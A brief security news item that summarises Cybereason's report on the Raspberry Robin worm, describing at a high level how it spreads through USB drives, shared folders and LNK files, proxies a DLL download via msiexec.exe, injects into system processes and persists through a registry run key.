Researchers Found Infection Chain in USB Devices and Shared Folders

Cybereason shared an infection chain involving Raspberry Robin, a malware worm that is often distributed through infected USB devices or shared folders. Although, the method is commonly observed to infect victims through Microsoft shortcut/LNK files, the delivery method has varied "through file archives, removable devices (USB) or ISO files." The LNK file calls on the Windows command shell to spawn msiexec.exe to proxy a download of a malicious DLL file. To maintain stealth the malware will inject itself into three processes often rundll32.exe, regsvr32.exe, and dllhost.exe. Persistence is established through the registry run key.

‍